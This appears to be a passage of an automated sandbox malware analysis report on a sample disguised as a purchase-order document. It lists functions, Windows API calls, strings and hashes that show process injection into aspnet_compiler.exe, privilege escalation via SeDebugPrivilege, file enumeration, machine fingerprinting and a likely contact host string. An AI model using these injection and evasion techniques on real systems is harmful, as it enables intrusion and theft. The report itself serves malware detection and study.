Opcode Fuzzy Hash: a213e41b820efb770fd02787e2bb04bd92d67161eca7ea03d04341aae952294a
Instruction Fuzzy Hash: 3E4167B9D04259DFCF10CFA9D984ADEFBB1BB19310F10A02AE814B7210D375AA45CF65

Function 01745948 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017459F5

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ba0d64776b0d299d17bc562b12d004d0fff7e743d704c2d04eb700430ce6bce0
Instruction ID: f66d4d9d630bebf1249145baae57cb9ee6789ea3e924bb2723c73744393be091
Opcode Fuzzy Hash: ba0d64776b0d299d17bc562b12d004d0fff7e743d704c2d04eb700430ce6bce0
Instruction Fuzzy Hash: B13164B9D042589FCF10CFAAD984ADEFBB5BB09310F10A02AE814B7210D335AA45CF65

Function 01745A58 Relevance: 1.6, APIs: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01745B05

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ae3f45bf97bb1127d19216128f8eb42def72fce4b9932a6a00ea7ab165231ee9
Instruction ID: 81f294d59134383d23e7060461b015ec3a6044bebc033513e4662bdfcde5e0f7
Opcode Fuzzy Hash: ae3f45bf97bb1127d19216128f8eb42def72fce4b9932a6a00ea7ab165231ee9
Instruction Fuzzy Hash: 553143B9D04258DFCF10CFA9D984ADEFBB5AB59310F10A02AE814B7310D335A946CF65

Function 01745A60 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01745B05

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 95af72b0ffc5f3875a187e6ac220a22e2a02dc0763b5bcb590c12eb6b1943eaf
Instruction ID: 7a01457b7ae3889cf4d5eaaa0d9f0dcfe7d05c54e787dd51efa377a426e652c5
Opcode Fuzzy Hash: 95af72b0ffc5f3875a187e6ac220a22e2a02dc0763b5bcb590c12eb6b1943eaf
Instruction Fuzzy Hash: F43143B9D04258DFCF10CFA9D984A9EFBB5BB19310F10A02AE918B7310D335A946CF65

Function 01745831 Relevance: 1.6, APIs: 1, Instructions: 90
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 017458E2

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 61406c736bea0f2de003478ea84859346f1e1134315310829903d038118d2e5b
Instruction ID: 1c93668d090832b1a6310e5746dbd99e20802a5ac4601e1bb079fdb626a71e7f
Opcode Fuzzy Hash: 61406c736bea0f2de003478ea84859346f1e1134315310829903d038118d2e5b
Instruction Fuzzy Hash: 9931AAB5D012589FDB10CFA9D884ADEFBF1BB49310F24902AE418B7310C778AA45CF64

Function 01745838 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 017458E2

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1d88b4686b38551ace2435b794050495102a4cb8308a0de5f0f17204fa273659
Instruction ID: 02e37472a11ac0603e30dfc8d023686ab55290b358d49e874dd628e2dbdd296c
Opcode Fuzzy Hash: 1d88b4686b38551ace2435b794050495102a4cb8308a0de5f0f17204fa273659
Instruction Fuzzy Hash: F73198B5D012589FDB10CFAAD984ADEFBF5BB49310F24802AE418B7350D778AA45CF64

Function 01745CA1 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 01745D1E

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 61fb05eb568312457536adb8bd490af61abaff59d6f96dfc65cb72ba2baf742a
Instruction ID: 30dc3149ccaf2cb73ee40ee40128c07a3ce080a3f41c26e1899514ff0fc1ad92
Opcode Fuzzy Hash: 61fb05eb568312457536adb8bd490af61abaff59d6f96dfc65cb72ba2baf742a
Instruction Fuzzy Hash: 17218AB9D002189FDB10CFA9D584ADEFBF4AF49320F14906AE818B7350D375A946CFA5

Function 01745CA8 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 01745D1E

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c7d496b0d9308a2e24453a188bbd129dbf8cd80a97b827d0e3f740e0694a57df
Instruction ID: 4a000d05c41b7fe3fc0454060ea64891fb57369b17916cf54e87b04d4a55351a
Opcode Fuzzy Hash: c7d496b0d9308a2e24453a188bbd129dbf8cd80a97b827d0e3f740e0694a57df
Instruction Fuzzy Hash: E62199B8D002189FDB10CFA9D484ADEFBF4EB09320F14906AE818B7310D335A945CFA5

Non-executed Functions

Function 017439C0 Relevance: .7, Instructions: 667COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd815a13e25a5b4c721d83af0ecf271e1fd170f22e4d201299f287543c295e9
Instruction ID: ad32d2ef98067b2a65195724b8b166196401c9d15659dd960cdaa1d0ace9518a
Opcode Fuzzy Hash: afd815a13e25a5b4c721d83af0ecf271e1fd170f22e4d201299f287543c295e9
Instruction Fuzzy Hash: 25919D71E052688FDB69CF29C8556D9FBF2AF8A300F14C1EAC14DAB251EB305E858F41

Function 01743FC3 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4920bdf832f7aa983b504e3c4c878cc7eb92ca2e708fbe77379c71d067fff421
Instruction ID: aa46262f0d0956e059796942002ecdc72e7f3f90abee9347ccc7f09e7861dd68
Opcode Fuzzy Hash: 4920bdf832f7aa983b504e3c4c878cc7eb92ca2e708fbe77379c71d067fff421
Instruction Fuzzy Hash: E8510974E052298FCB68CF25C9856DAF7F2BF89300F6085EA810DA7254DB309F858F40

Function 01744001 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1335928322.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1740000_(PO403810)_VOLEX_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 406ce06e54dd0a0ec30c171bb1504b8c362a44d98ef738c812b7873ecd8f3624
Instruction ID: d068282319949c716f5600c0a266db6dd22dbc7e15e9444f55935e6990b3528b
Opcode Fuzzy Hash: 406ce06e54dd0a0ec30c171bb1504b8c362a44d98ef738c812b7873ecd8f3624
Instruction Fuzzy Hash: F8410674E052298FCBA8CF25C9816DAF7F2FF89700F2085EA810DA7250DB309E958F40

Analysis Process: aspnet_compiler.exePID: 720, Parent PID: 6936COMMON

Execution Graph

Execution Coverage:	30.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 37bd598f585ee8cf67de5fee61dd0e5a81eae48bc97895d0ca2fa425d208ebcc
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 37bd598f585ee8cf67de5fee61dd0e5a81eae48bc97895d0ca2fa425d208ebcc
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 1ea65f7b2f5c66bc8d7842cb742c2a7fab5a9360e6dc5d4cf67b88a48fb7ceab
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 1ea65f7b2f5c66bc8d7842cb742c2a7fab5a9360e6dc5d4cf67b88a48fb7ceab
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 7ce7633a075ddea787b33ce87c6c428a1d74d746fa12bb75d4846fd50f5e3e20
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 7ce7633a075ddea787b33ce87c6c428a1d74d746fa12bb75d4846fd50f5e3e20
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 7bf50091bcfb9a02a13952a1e8bd1f425a35c82d03e3d9e3531f97b66e5a18c7
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 7bf50091bcfb9a02a13952a1e8bd1f425a35c82d03e3d9e3531f97b66e5a18c7
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

